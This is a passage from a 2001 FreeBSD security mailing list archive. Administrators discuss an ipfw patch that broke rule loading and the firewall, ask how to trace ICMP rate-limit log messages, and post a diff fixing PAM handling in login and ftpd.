i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Jan 26, 2001 at 08:00:04AM +0200, Justin Stanford wrote: > Hi, > > I upgraded my ipfw yesterday on my 4.0-STABLE system with the patch by > following the instructions to the letter for the security bug discovered > by Aragon Gouveia, and compile and install appeared to go seamlessly. > > However, ipfw now gives me this type of problem: > > [root@athena]~# ipfw add 5000 deny tcp from any to 196.30.167.200 515 via rl0 > 05000 deny tcp from any to 196.30.167.200 515 via rl0 > ip_fw_ctl: empty interface name > ipfw: setsockopt(IP_FW_ADD): Invalid argument > [root@athena]~# You have to compile ipfw(8), compile a new kernel (or reload a new module), and ipfw(8) needs to have /sys/netinet/ip_fw.h copied to /usr/include/netinet unless you used buildworld(this needs to happen before recompiling ipfw). -- Bill Fumerola - security yahoo / Yahoo! inc. - fumerola@yahoo-inc.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 1:45:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (host-170.creativehouse.maxlink.com [216.221.214.170]) by hub.freebsd.org (Postfix) with ESMTP id 3E20937B400 for ; Fri, 26 Jan 2001 01:45:37 -0800 (PST) Received: from Laptop (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.1/8.11.1) with ESMTP id f0Q9jPK88370 for ; Fri, 26 Jan 2001 04:45:26 -0500 (EST) (envelope-from mit@mitayai.net) From: "Will Mitayai Keeso Rowe" To: Subject: ICMP attacks Date: Fri, 26 Jan 2001 04:44:51 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > icmp-response bandwidth limit 205/200 pps > icmp-response bandwidth limit 264/200 pps > icmp-response bandwidth limit 269/200 pps > icmp-response bandwidth limit 273/200 pps > icmp-response bandwidth limit 273/200 pps > icmp-response bandwidth limit 271/200 pps > icmp-response bandwidth limit 261/200 pps > icmp-response bandwidth limit 268/200 pps > icmp-response bandwidth limit 205/200 pps > icmp-response bandwidth limit 223/200 pps Is there any way to trace the people that are causing this? It's becoming a daily occurance and it's beginning to irritate me. -Mit To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 1:53: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 92A0A37B698 for ; Fri, 26 Jan 2001 01:52:41 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0Q9u5V74382; Fri, 26 Jan 2001 01:56:05 -0800 (PST) (envelope-from kris) Date: Fri, 26 Jan 2001 01:56:05 -0800 From: Kris Kennaway To: Will Mitayai Keeso Rowe Cc: freebsd-security@FreeBSD.ORG Subject: Re: ICMP attacks Message-ID: <20010126015605.A74360@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="ikeVEW9yuYc//A+q" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from mit@mitayai.net on Fri, Jan 26, 2001 at 04:44:51AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --ikeVEW9yuYc//A+q Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jan 26, 2001 at 04:44:51AM -0500, Will Mitayai Keeso Rowe wrote: > > icmp-response bandwidth limit 205/200 pps > > icmp-response bandwidth limit 264/200 pps > > icmp-response bandwidth limit 269/200 pps > > icmp-response bandwidth limit 273/200 pps > > icmp-response bandwidth limit 273/200 pps > > icmp-response bandwidth limit 271/200 pps > > icmp-response bandwidth limit 261/200 pps > > icmp-response bandwidth limit 268/200 pps > > icmp-response bandwidth limit 205/200 pps > > icmp-response bandwidth limit 223/200 pps >=20 > Is there any way to trace the people that are causing this? It's becoming= a > daily occurance and it's beginning to irritate me. It's not necessarily an attack - could be a simple local misconfiguration. Check the archives for more. Kris --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --ikeVEW9yuYc//A+q Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6cUm0Wry0BWjoQKURAnceAKC1ujjb5QegpUSvM3rp6P6cdr/7BACbBqi6 8tGiNTYxVohzCmRgXLUJFnc= =Obmb -----END PGP SIGNATURE----- --ikeVEW9yuYc//A+q-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 1:55:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from supermall.dk (mail.absolute-promotion.dk [195.41.95.9]) by hub.freebsd.org (Postfix) with SMTP id 211E937B404 for ; Fri, 26 Jan 2001 01:55:28 -0800 (PST) Received: (qmail 10942 invoked from network); 26 Jan 2001 09:46:42 -0000 Received: from unknown (HELO incorp.dk) (195.41.95.56) by mail.absolute-promotion.dk with SMTP; 26 Jan 2001 09:46:42 -0000 Message-ID: <3A715799.8EECF43@incorp.dk> Date: Fri, 26 Jan 2001 10:55:21 +0000 From: Dennis Rand X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: ICMP attacks References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I also have this problem but that is when i portscan my computer from another host so is there a place or a log where i can check what IP has caused this Will Mitayai Keeso Rowe wrote: > > icmp-response bandwidth limit 205/200 pps > > icmp-response bandwidth limit 264/200 pps > > icmp-response bandwidth limit 269/200 pps > > icmp-response bandwidth limit 273/200 pps > > icmp-response bandwidth limit 273/200 pps > > icmp-response bandwidth limit 271/200 pps > > icmp-response bandwidth limit 261/200 pps > > icmp-response bandwidth limit 268/200 pps > > icmp-response bandwidth limit 205/200 pps > > icmp-response bandwidth limit 223/200 pps > > Is there any way to trace the people that are causing this? It's becoming a > daily occurance and it's beginning to irritate me. > > -Mit > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Med Venlig Hilsen / Best regards __________________________ Dennis Rand inCorp A/S - Odense Middelfartvej 9-11 5000 Odense C Tlf.: 70 22 55 30 Fax.: 63 12 55 39 Email: dr@incorp.dk http://www.inCorp.dk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 1:58:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 6E85B37B402 for ; Fri, 26 Jan 2001 01:57:52 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0QA1Fa74547; Fri, 26 Jan 2001 02:01:15 -0800 (PST) (envelope-from kris) Date: Fri, 26 Jan 2001 02:01:15 -0800 From: Kris Kennaway To: Dennis Rand Cc: freebsd-security@FreeBSD.ORG Subject: Re: ICMP attacks Message-ID: <20010126020115.A74520@citusc17.usc.edu> References: <3A715799.8EECF43@incorp.dk> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="45Z9DzgjV8m4Oswq" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A715799.8EECF43@incorp.dk>; from dr@incorp.dk on Fri, Jan 26, 2001 at 10:55:21AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --45Z9DzgjV8m4Oswq Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jan 26, 2001 at 10:55:21AM +0000, Dennis Rand wrote: > I also have this problem but that is when i portscan my computer from ano= ther > host so is there a place or a log where i can check what IP has caused th= is Use something like tcpdump, or ipfw. Kris --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --45Z9DzgjV8m4Oswq Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6cUrrWry0BWjoQKURAo/jAJ9EB/uzrOgpXlflruyaVOCXtbq7NwCgjrFm swcLZRMrgyO3GgmNZuv20Pg= =KsXT -----END PGP SIGNATURE----- --45Z9DzgjV8m4Oswq-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 2: 1:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 037DA37B698 for ; Fri, 26 Jan 2001 02:00:53 -0800 (PST) Received: (qmail 6861 invoked by uid 1000); 26 Jan 2001 09:58:59 -0000 Date: Fri, 26 Jan 2001 11:58:59 +0200 From: Peter Pentchev To: Dennis Rand Cc: freebsd-security@freebsd.org Subject: Re: ICMP attacks Message-ID: <20010126115858.B5418@ringworld.oblivion.bg> Mail-Followup-To: Dennis Rand , freebsd-security@freebsd.org References: <3A715799.8EECF43@incorp.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A715799.8EECF43@incorp.dk>; from dr@incorp.dk on Fri, Jan 26, 2001 at 10:55:21AM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Jan 26, 2001 at 10:55:21AM +0000, Dennis Rand wrote: > I also have this problem but that is when i portscan my computer from another > host so is there a place or a log where i can check what IP has caused this You can make your firewall log all denied packets - it's those that cause ICMP responses, mostly. I'm not sure logging all denied packets is a good idea, though, especially if you expect - or even deem it possible - that you might be attacked. Trust me, I've had syslogd hog my CPU during a portscan :) G'luck, Peter -- When you are not looking at it, this sentence is in Spanish. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 2: 1:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (host-170.creativehouse.maxlink.com [216.221.214.170]) by hub.freebsd.org (Postfix) with ESMTP id 54EA137B699; Fri, 26 Jan 2001 02:01:12 -0800 (PST) Received: from Laptop (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.1/8.11.1) with ESMTP id f0QA1BK92446; Fri, 26 Jan 2001 05:01:11 -0500 (EST) (envelope-from mit@mitayai.net) From: "Will Mitayai Keeso Rowe" To: "Kris Kennaway" Cc: Subject: RE: ICMP attacks Date: Fri, 26 Jan 2001 05:00:37 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 In-Reply-To: <20010126015605.A74360@citusc17.usc.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org even if it happens at no predictable intervals, and sometimes not for days? :-----Original Message----- :From: Kris Kennaway [mailto:kris@FreeBSD.ORG] :Sent: January 26, 2001 04:56 AM :To: Will Mitayai Keeso Rowe :Cc: freebsd-security@FreeBSD.ORG :Subject: Re: ICMP attacks : : :On Fri, Jan 26, 2001 at 04:44:51AM -0500, Will Mitayai Keeso Rowe wrote: :> > icmp-response bandwidth limit 205/200 pps :> > icmp-response bandwidth limit 264/200 pps :> > icmp-response bandwidth limit 269/200 pps :> > icmp-response bandwidth limit 273/200 pps :> > icmp-response bandwidth limit 273/200 pps :> > icmp-response bandwidth limit 271/200 pps :> > icmp-response bandwidth limit 261/200 pps :> > icmp-response bandwidth limit 268/200 pps :> > icmp-response bandwidth limit 205/200 pps :> > icmp-response bandwidth limit 223/200 pps :> :> Is there any way to trace the people that are causing this? It's :becoming a :> daily occurance and it's beginning to irritate me. : :It's not necessarily an attack - could be a simple local :misconfiguration. Check the archives for more. : :Kris : :-- :NOTE: To fetch an updated copy of my GPG key which has not expired, :finger kris@FreeBSD.org : To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 2: 6:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 47F6D37B401 for ; Fri, 26 Jan 2001 02:05:48 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0QA9Bj74775; Fri, 26 Jan 2001 02:09:11 -0800 (PST) (envelope-from kris) Date: Fri, 26 Jan 2001 02:09:10 -0800 From: Kris Kennaway To: Will Mitayai Keeso Rowe Cc: freebsd-security@FreeBSD.ORG Subject: Re: ICMP attacks Message-ID: <20010126020910.A74755@citusc17.usc.edu> References: <20010126015605.A74360@citusc17.usc.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="fdj2RfSjLxBAspz7" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from mit@mitayai.net on Fri, Jan 26, 2001 at 05:00:37AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --fdj2RfSjLxBAspz7 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Jan 26, 2001 at 05:00:37AM -0500, Will Mitayai Keeso Rowe wrote: > even if it happens at no predictable intervals, and sometimes not for day= s? Yes. Kris --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --fdj2RfSjLxBAspz7 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6cUzGWry0BWjoQKURAi//AKCBSRGj/hxrTZD4/RufZqFxAa+V2QCfXcIl lAtzbUDCmcPHBCqXgX4WdtM= =tS7N -----END PGP SIGNATURE----- --fdj2RfSjLxBAspz7-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 2:12:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [207.154.226.10]) by hub.freebsd.org (Postfix) with ESMTP id 1AC4437B401 for ; Fri, 26 Jan 2001 02:12:32 -0800 (PST) Received: by elvis.mu.org (Postfix, from userid 1098) id 5307D2B2BC; Fri, 26 Jan 2001 04:12:21 -0600 (CST) Date: Fri, 26 Jan 2001 04:12:21 -0600 From: Bill Fumerola To: Will Mitayai Keeso Rowe Cc: freebsd-security@freebsd.org Subject: Re: ICMP attacks Message-ID: <20010126041221.J57121@elvis.mu.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from mit@mitayai.net on Fri, Jan 26, 2001 at 04:44:51AM -0500 X-Operating-System: FreeBSD 4.2-FEARSOME-20001103 i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Jan 26, 2001 at 04:44:51AM -0500, Will Mitayai Keeso Rowe wrote: > > icmp-response bandwidth limit 205/200 pps > > icmp-response bandwidth limit 264/200 pps > > icmp-response bandwidth limit 269/200 pps > > icmp-response bandwidth limit 273/200 pps > > icmp-response bandwidth limit 273/200 pps > > icmp-response bandwidth limit 271/200 pps > > icmp-response bandwidth limit 261/200 pps > > icmp-response bandwidth limit 268/200 pps > > icmp-response bandwidth limit 205/200 pps > > icmp-response bandwidth limit 223/200 pps > > Is there any way to trace the people that are causing this? It's becoming a > daily occurance and it's beginning to irritate me. tcpdump(1) -- Bill Fumerola - security yahoo / Yahoo! inc. - fumerola@yahoo-inc.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 3:35:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from expert.com.br (soure.expert.com.br [200.242.253.1]) by hub.freebsd.org (Postfix) with SMTP id 2204A37B400 for ; Fri, 26 Jan 2001 03:35:07 -0800 (PST) Received: (qmail 48512 invoked from network); 26 Jan 2001 11:39:15 -0000 Received: from unknown (HELO nirvana) (200.242.253.60) by soure.expert.com.br with SMTP; 26 Jan 2001 11:39:15 -0000 Message-ID: <003601c0878c$2ec00040$3cfdf2c8@nirvana> From: "Roberto Samarone Araujo (RSA)" To: References: Subject: Re: ICMP attacks Date: Fri, 26 Jan 2001 08:36:10 -0300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.3018.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > icmp-response bandwidth limit 261/200 pps > > icmp-response bandwidth limit 268/200 pps > > icmp-response bandwidth limit 205/200 pps > > icmp-response bandwidth limit 223/200 pps Hi, Sometimes, when someone is trying to do a port scan, this message appear so, if you want to know who is trying to make a port scan to your FreeBSD box you can use the PortsEntry, it will log the ports scan. You can compile it from the ports collection. Roberto Samarone Araujo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 5:40:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from jenkins.web.us.uu.net (jenkins.web.us.uu.net [208.240.88.32]) by hub.freebsd.org (Postfix) with ESMTP id 16EB337B400 for ; Fri, 26 Jan 2001 05:40:30 -0800 (PST) Received: by jenkins.web.us.uu.net (Postfix, from userid 515) id 6323412685; Fri, 26 Jan 2001 08:40:29 -0500 (EST) From: "David J. MacKenzie" MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14961.32333.212703.615370@jenkins.web.us.uu.net> Date: Fri, 26 Jan 2001 08:40:29 -0500 (EST) To: freebsd-security@freebsd.org Subject: full PAM support patch for ftpd and fix for login X-Mailer: VM 6.62 under Emacs 19.34.1 X-Quote: It's a good thing we have gravity or else when birds died they'd just stay right up there. Hunters would be all confused. -- Stephen Wright Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My full PAM support patch for login mishandles some return values, for which my fix is: --- login.c 2001/01/23 23:15:29 1.10 +++ login.c 2001/01/26 13:36:49 @@ -790,20 +790,20 @@ break; } - if (rval != -1) { + if (rval == 0) { e = pam_acct_mgmt(pamh, 0); if (e == PAM_NEW_AUTHTOK_REQD) { e = pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); if (e != PAM_SUCCESS) { syslog(LOG_ERR, "pam_chauthtok: %s", pam_strerror(pamh, e)); - rval = -1; + rval = 1; } } else if (e != PAM_SUCCESS) { rval = 1; } } - if (rval == -1) { + if (rval != 0) { if ((e = pam_end(pamh, e)) != PAM_SUCCESS) { syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); } which I discovered while adapting that patch to ftpd: --- ./Makefile 2001/01/26 13:12:30 1.1 +++ ./Makefile 2001/01/26 13:12:43 @@ -18,9 +18,8 @@ SRCS+= ls.c cmp.c print.c util.c CFLAGS+=-Dmain=ls_main -I${.CURDIR}/${LSDIR} -.if defined(NOPAM) -CFLAGS+=-DNOPAM -.else +.if !defined(NOPAM) +CFLAGS+=-DUSE_PAM DPADD+= ${LIBPAM} LDADD+= ${MINUSLPAM} .endif --- ./ftpd.c 2001/01/25 22:09:55 1.1 +++ ./ftpd.c 2001/01/26 13:37:17 @@ -94,7 +94,7 @@ #include #endif -#if !defined(NOPAM) +#ifdef USE_PAM #include #endif @@ -179,8 +179,9 @@ static char ttyline[20]; char *tty = ttyline; /* for klogin */ -#if !defined(NOPAM) +#ifdef USE_PAM static int auth_pam __P((struct passwd**, const char*)); +pam_handle_t *pamh = NULL; #endif char *pid_file = NULL; @@ -1015,6 +1016,9 @@ static void end_login() { +#ifdef USE_PAM + int e; +#endif (void) seteuid((uid_t)0); if (logged_in) @@ -1024,12 +1028,21 @@ setusercontext(NULL, getpwuid(0), (uid_t)0, LOGIN_SETPRIORITY|LOGIN_SETRESOURCES|LOGIN_SETUMASK); #endif +#ifdef USE_PAM + if ((e = pam_setcred(pamh, PAM_DELETE_CRED)) != PAM_SUCCESS) + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, e)); + if ((e = pam_close_session(pamh,0)) != PAM_SUCCESS) + syslog(LOG_ERR, "pam_close_session: %s", pam_strerror(pamh, e)); + if ((e = pam_end(pamh, e)) != PAM_SUCCESS) + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); + pamh = NULL; +#endif logged_in = 0; guest = 0; dochroot = 0; } -#if !defined(NOPAM) +#ifdef USE_PAM /* * the following code is stolen from imap-uw PAM authentication module and @@ -1148,19 +1161,34 @@ break; default: - syslog(LOG_ERR, "auth_pam: %s", pam_strerror(pamh, e)); + syslog(LOG_ERR, "pam_authenticate: %s", pam_strerror(pamh, e)); rval = -1; break; } - if ((e = pam_end(pamh, e)) != PAM_SUCCESS) { - syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); - rval = -1; + if (rval == 0) { + e = pam_acct_mgmt(pamh, 0); + if (e == PAM_NEW_AUTHTOK_REQD) { + e = pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); + if (e != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_chauthtok: %s", pam_strerror(pamh, e)); + rval = 1; + } + } else if (e != PAM_SUCCESS) { + rval = 1; + } + } + + if (rval != 0) { + if ((e = pam_end(pamh, e)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); + } + pamh = NULL; } return rval; } -#endif /* !defined(NOPAM) */ +#endif /* USE_PAM */ void pass(passwd) @@ -1171,6 +1199,9 @@ #ifdef LOGIN_CAP login_cap_t *lc = NULL; #endif +#ifdef USE_PAM + int e; +#endif if (logged_in || askpasswd == 0) { reply(503, "Login with USER first."); @@ -1182,7 +1213,7 @@ rval = 1; /* failure below */ goto skip; } -#if !defined(NOPAM) +#ifdef USE_PAM rval = auth_pam(&pw, passwd); if (rval >= 0) goto skip; @@ -1261,6 +1292,16 @@ #else setlogin(pw->pw_name); (void) initgroups(pw->pw_name, pw->pw_gid); +#endif + +#ifdef USE_PAM + if (pamh) { + if ((e = pam_open_session(pamh, 0)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_open_session: %s", pam_strerror(pamh, e)); + } else if ((e = pam_setcred(pamh, PAM_ESTABLISH_CRED)) != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_setcred: %s", pam_strerror(pamh, e)); + } + } #endif /* open wtmp before chroot */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 6:41:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from pozitif.net (unknown [213.194.71.201]) by hub.freebsd.org (Postfix) with SMTP id 7611537B400; Fri, 26 Jan 2001 06:41:25 -0800 (PST) Received: from pozitif.net ([62.29.69.50]) by pozitif.net ; Fri, 26 Jan 2001 16:49:24 +0200 Message-ID: <3A718C97.E45FA754@pozitif.net> Date: Fri, 26 Jan 2001 16:41:28 +0200 From: Mehmet Hinc X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Justin Stanford Cc: questions@freebsd.org, security@freebsd.org Subject: Re: ipfw security patch problem.. References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Justin Stanford wrote: > Hi, > > I upgraded my ipfw yesterday on my 4.0-STABLE system with the patch by > following the instructions to the letter for the security bug discovered > by Aragon Gouveia, and compile and install appeared to go seamlessly. > > However, ipfw now gives me this type of problem: > > [root@athena]~# ipfw add 5000 deny tcp from any to 196.30.167.200 515 via rl0 > 05000 deny tcp from any to 196.30.167.200 515 via rl0 > ip_fw_ctl: empty interface name > ipfw: setsockopt(IP_FW_ADD): Invalid argument > [root@athena]~# > > The interface is most definitely rl0, and this exact ruleset is the same I > have been using for ages with my previous ipfw. Suggestions? > > -- > Justin Stanford > 082 7402741 > jus@security.za.net > www.security.za.net > IT Security and Solutions > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Yup, I`ve heard this problem and I tried to solve it.I copied /sys/netinet/ip_fw.h to /usr/include/netine and then I recompiled my kernel . After then this problem has disapeared from my box. Mehmet Hinc Yildiz Teknik University >From Turkey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 7: 0:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.marketnews.com (mail.economeister.com [205.183.200.2]) by hub.freebsd.org (Postfix) with ESMTP id 89F0037B400 for ; Fri, 26 Jan 2001 06:59:55 -0800 (PST) Received: (from nobody@localhost) by mail.marketnews.com (8.11.0/8.9.3) id f0QExcZ56271; Fri, 26 Jan 2001 09:59:38 -0500 (EST) X-Authentication-Warning: mail.marketnews.com: nobody set sender to mharding@marketnews.com using -f To: Will Mitayai Keeso Rowe Subject: Re: ICMP attacks Message-ID: <980521178.3a7190da7ba07@mail.marketnews.com> Date: Fri, 26 Jan 2001 09:59:38 -0500 From: Cc: References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0-pre13 X-Originating-IP: 63.23.140.194 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Try using a Intrusion detection system. Snort works well for me. If this is just a port scan it will show a lot of different attack warnings as the different ports are hit, but it will show what IP is doing it. Mason Quoting Will Mitayai Keeso Rowe : > > icmp-response bandwidth limit 205/200 pps > > icmp-response bandwidth limit 264/200 pps > > icmp-response bandwidth limit 269/200 pps > > icmp-response bandwidth limit 273/200 pps > > icmp-response bandwidth limit 273/200 pps > > icmp-response bandwidth limit 271/200 pps > > icmp-response bandwidth limit 261/200 pps > > icmp-response bandwidth limit 268/200 pps > > icmp-response bandwidth limit 205/200 pps > > icmp-response bandwidth limit 223/200 pps > > Is there any way to trace the people that are causing this? It's > becoming a > daily occurance and it's beginning to irritate me. > > -Mit > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 8:36:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from flint.asdis.com (flint.asdis.com [212.222.145.99]) by hub.freebsd.org (Postfix) with ESMTP id CCAA137B401 for ; Fri, 26 Jan 2001 08:36:36 -0800 (PST) Received: from sarek.itp.asdis.de ([10.63.192.115] helo=asdis.de) by flint.asdis.com with esmtp (Exim 3.13 #1) id 14MBrX-000CFK-00 for freebsd-security@freebsd.org; Fri, 26 Jan 2001 17:36:35 +0100 Received: by asdis.de (Smail-3.2.0.102asdis 1998-Aug-2 #7) id ; Fri, 26 Jan 2001 17:36:34 +0100 (CET) Message-Id: <5.0.0.25.1.20010126173443.02d9e1e8@pop3.itp.asdis.de> X-Sender: mib@pop3.itp.asdis.de X-Mailer: QUALCOMM Windows Eudora Version 5.0 Date: Fri, 26 Jan 2001 17:36:33 +0100 To: freebsd-security@freebsd.org From: Martin Ibert Subject: Another problem with the ipfw patch - even bigger hole in the firewall on 4.0R (was: Re: ipfw security patch problem..) Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1"; format=flowed Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [Sorry Justin! I forgot to Cc: the list when I replied to your mail, so you= =20 now have it twice. :-( ] At 08:00 26.01.2001 +0200, you wrote: >I upgraded my ipfw yesterday on my 4.0-STABLE system with the patch by >following the instructions to the letter for the security bug discovered >by Aragon Gouveia, and compile and install appeared to go seamlessly. We also tried to patch a 4.0-RELEASE system. We worked according to the=20 step-by-step instructions provided in the advisory. Some patches were=20 rejected and had to be done by hand, but apart from that, no major problems= =20 were discovered during build and install. However, the resulting combination of kernel and ipfw tool did not work! It= =20 appears that the firewall took EVERY tcp packet to be part of an=20 "establised" connection and happily past setup packets in and out. We quickly retraced our steps and reverted the system to its pre-patched= state. Did anyone experience the same problems as we did? And does anyone have a=20 